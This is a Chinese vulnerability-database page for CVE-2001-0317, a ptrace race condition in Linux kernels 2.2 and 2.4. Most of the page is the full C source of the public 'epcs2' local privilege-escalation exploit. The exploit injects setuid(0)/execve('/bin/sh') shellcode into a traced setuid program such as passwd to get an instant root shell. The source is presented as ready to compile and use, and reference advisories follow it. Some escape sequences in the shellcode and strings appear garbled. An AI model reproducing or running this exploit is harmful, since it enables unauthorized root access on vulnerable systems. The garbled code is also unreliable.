Linux kernel ptrace竞态条件漏洞
漏洞ID | 1106269 | 漏洞类型 | 未知 |
发布时间 | 2001-03-27 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2001-0317 |
CNNVD-ID | CNNVD-200105-038 |
漏洞平台 | Linux | CVSS评分 | 3.7 |
|漏洞来源
|漏洞详情
Linux kernel 2.4 和 2.2 版本中 ptrace 存在竞态条件漏洞。本地用户可通过使用 ptrace 追踪并修改正在运行的 setuid（修改用户标识符）程序来提升特权。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/2529/info
The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers.
A problem in the Linux Kernel could make it possible for a local user to gain elevated privileges. The problem lies in how process tracing is checked when a program executes another program that is setuid or setgid: it is possible to trace a process after it has entered a setuid or setgid execution state.
This makes it possible for a local user to change parts of the process as they function, and potentially gain elevated privileges.
*/
/*
* epcs2 (improved by lst [[email protected]])
* ~~~~~~~
* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
*
* originally by:
* (c) 2001 Wojciech Purczynski / cliph / <[email protected]>
*
* improved by:
* lst [[email protected]]
*
* This sploit does _not_ use brute force. It does not need that.
* It makes only one attempt to sploit the race condition in execve.
* The parent process waits for a context-switch that occurs after
* the child task sleeps in execve.
*
* It should work even on openwall-patched kernels (I haven't tested it).
*
* Compile it:
* cc epcs.c -o epcs
* Usage:
* ./epcs [victim]
*
* It gives instant root shell with any of a suid binaries.
*
* If it does not work, try use some methods to ensure that execve
* would sleep while loading binary file into memory,
*
* i.e.: cat /usr/lib/* >/dev/null 2>&1
*
* Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
* This exploit does not work on 2.4.x because kernel won't set suid
* privileges if user ptraces a binary.
* But it is still exploitable on these kernels.
*
* Thanks to Bulba (he made me to take a look at this bug ;) )
* Greetings to SigSegv team.
*
* -- d00t
* improved by lst [[email protected]]
* props to kevin for most of the work
*
* now works on stack non-exec systems with some neat trickery for the automated
* method, ie. no need to find the bss segment via objdump
*
* particularly it now rewrites the code instruction sets in the
* dynamic linker _start segment and continues execution from there.
*
* an aside, due to the fact that the code self-modifies, it wouldn't work
* quite correctly on a stack non-exec system without playing directly with
* the bss segment (ie no regs.eip = regs.esp change). this is much more
* automated. however, do note that the previous version did not trigger stack
* non-exec warnings due to how it was operating. note that the regs.eip = regs.esp
* method will break on stack non-exec systems.
*
* as always.. enjoy.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <signal.h>
#include <linux/user.h>
#include <sys/wait.h>
#include <limits.h>
#include <errno.h>
#include <stdlib.h>
/* Signal used for the parent/child hand-shake (see cs_sig_handler, do_victim, main). */
#define CS_SIGNAL SIGUSR1
/* Default target executed by the child when no argv[1] is given (see main). */
#define VICTIM "/usr/bin/passwd"
/* Path appended to the end of the payload string below as its execve argument. */
#define SHELL "/bin/sh"
/*
* modified simple shell code with some trickery (hand tweaks)
*/
/* Byte string that main() writes into the traced child with PTRACE_POKETEXT;
 * the SHELL path is concatenated onto the end so the execve in the payload
 * can find it (see the per-line comments). */
char shellcode[]=
"x90x90x90x90x90x90x90x90x90"
"x31xc0x31xdbxb0x17xcdx80" /* setuid(0) */
"x31xc0xb0x2excdx80"
"x31xc0x50xebx17x8bx1cx24" /* execve(SHELL) */
"x90x90x90x89xe1x8dx54x24" /* lets be tricky */
"x04xb0x0bxcdx80x31xc0x89"
"xc3x40xcdx80xe8xe4xffxff"
"xff" SHELL "x00x00x00" ; /* pad me */
/* Synchronisation flag: set to 1 by cs_sig_handler() when CS_SIGNAL arrives,
 * busy-polled by do_victim() and main(). volatile keeps the spin loops from
 * being optimised away; sig_atomic_t would be the portable type for this. */
volatile int cs_detector=0;
/*
 * CS_SIGNAL handler: records that the peer process has signalled us.
 * Only the flag is written, so the handler stays async-signal-safe.
 */
void cs_sig_handler(int sig)
{
(void)sig; /* a single signal is routed here; its number is not needed */
cs_detector = 1;
}
/*
 * Child side of the hand-shake.
 * Spins until the parent's CS_SIGNAL has been seen (cs_detector is set by
 * cs_sig_handler), signals the parent back, then replaces itself with
 * `filename` via execl(). Control returns only if execl() fails, in which
 * case the error is printed and the process exits with -1.
 */
void do_victim(char * filename)
{
while (!cs_detector) ;   /* wait for the parent's CS_SIGNAL */
kill(getppid(), CS_SIGNAL);   /* tell the parent we are about to exec */
execl(filename, filename, NULL);
perror("execl");   /* reached only when execl() fails */
exit(-1);
}
/*
 * Reports whether `victim` has already completed its exec: returns non-zero
 * (and prints a diagnostic) when /proc/<pid>/exe already resolves to
 * `filename`, 0 when it does not, and -1 if the link cannot be read.
 * NOTE(review): readlink() does not NUL-terminate its output and the length
 * it returns is discarded here; as printed, only the buffer's final byte is
 * written, so strcmp() may read uninitialised bytes past the link text.
 */
int check_execve(pid_t victim, char * filename)
{
char path[PATH_MAX+1];
char link[PATH_MAX+1];
int res;
/* /proc/<pid>/exe is a symlink to the image the task is currently running */
snprintf(path, sizeof(path), "/proc/%i/exe", (int)victim);
if (readlink(path, link, sizeof(link)-1)<0) {
perror("readlink");
return -1;
}
/* only the final byte is set; the length returned by readlink() is not used */
link[sizeof(link)-1]=' ';
/* equal paths mean the exec has already completed */
res=!strcmp(link, filename);
if (res) fprintf(stderr, "child slept outside of execven");
return res;
}
/*
 * Parent side: forks the victim, hand-shakes with it via CS_SIGNAL, attaches
 * with ptrace while the child is inside execve(filename), writes `shellcode`
 * over the child's text at regs.eip and resumes it. Uses argv[1] as the
 * target when given, else VICTIM. Returns 0 on success; on any failure jumps
 * to the `exit` label, kills the child and returns -1.
 * The header comment above notes that 2.4.x kernels refuse the setuid grant
 * to a traced exec; that kernel-side check is what this flow relies on being
 * absent.
 */
int main(int argc, char * argv[])
{
char * filename=VICTIM;
pid_t victim;
int error, i;   /* `error` is never used below */
struct user_regs_struct regs;
/* take our command args if you wanna play with other progs */
if (argc>1) filename=argv[1];
signal(CS_SIGNAL, cs_sig_handler);   /* installed before fork so the child inherits it */
victim=fork();
if (victim<0) {
perror("fork: victim");
exit(-1);
}
if (victim==0) do_victim(filename);   /* the child never returns from here */
kill(victim, CS_SIGNAL);   /* release the child's spin loop ... */
while (!cs_detector) ;   /* ... and wait for its reply, sent just before execl() */
/* ptrace() is variadic in glibc, so the omitted addr/data arguments are accepted */
if (ptrace(PTRACE_ATTACH, victim)) {
perror("ptrace: PTRACE_ATTACH");
goto exit;
}
/* non-zero also covers check_execve's -1 (readlink failed) */
if (check_execve(victim, filename))
goto exit;
(void)waitpid(victim, NULL, WUNTRACED);   /* wait for the attach stop */
if (ptrace(PTRACE_CONT, victim, 0, 0)) {
perror("ptrace: PTRACE_CONT");
goto exit;
}
(void)waitpid(victim, NULL, WUNTRACED);   /* wait for the child's next stop */
if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_GETREGS");
goto exit;
}
/* make sure that last null is in there */
/* 4-byte stride and regs.eip: i386-specific (see <linux/user.h>); the
 * int/size_t comparison is a sign-mismatch warning under -Wextra */
for (i=0; i<=strlen(shellcode); i+=4) {
if (ptrace(PTRACE_POKETEXT, victim, regs.eip+i,
*(int*)(shellcode+i))) {
perror("ptrace: PTRACE_POKETEXT");
goto exit;
}
}
/* registers are written back unchanged; only the text at eip was replaced */
if (ptrace(PTRACE_SETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_SETREGS");
goto exit;
}
fprintf(stderr, "bug exploited successfully.nenjoy!n");
if (ptrace(PTRACE_DETACH, victim, 0, 0)) {
perror("ptrace: PTRACE_DETACH");
goto exit;
}
(void)waitpid(victim, NULL, 0);   /* reap the child */
return 0;
/* labels live in their own namespace, so this does not clash with exit() */
exit:
fprintf(stderr, "d0h! error!n");
kill(victim, SIGKILL);   /* do not leave a half-patched child behind */
return -1;
}
|参考资料
来源:CALDERA
名称:CSSA-2001-009
链接:http://www.caldera.com/support/security/advisories/CSSA-2001-009.0.txt
来源:BUGTRAQ
名称:20010213TrustixSecurityAdvisory-proftpd,kernel
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0267.html
来源:XF
名称:linux-ptrace-modify-process(6080)
链接:http://xforce.iss.net/xforce/xfdb/6080
来源:REDHAT
名称:RHSA-2001:013
链接:http://www.redhat.com/support/errata/RHSA-2001-013.html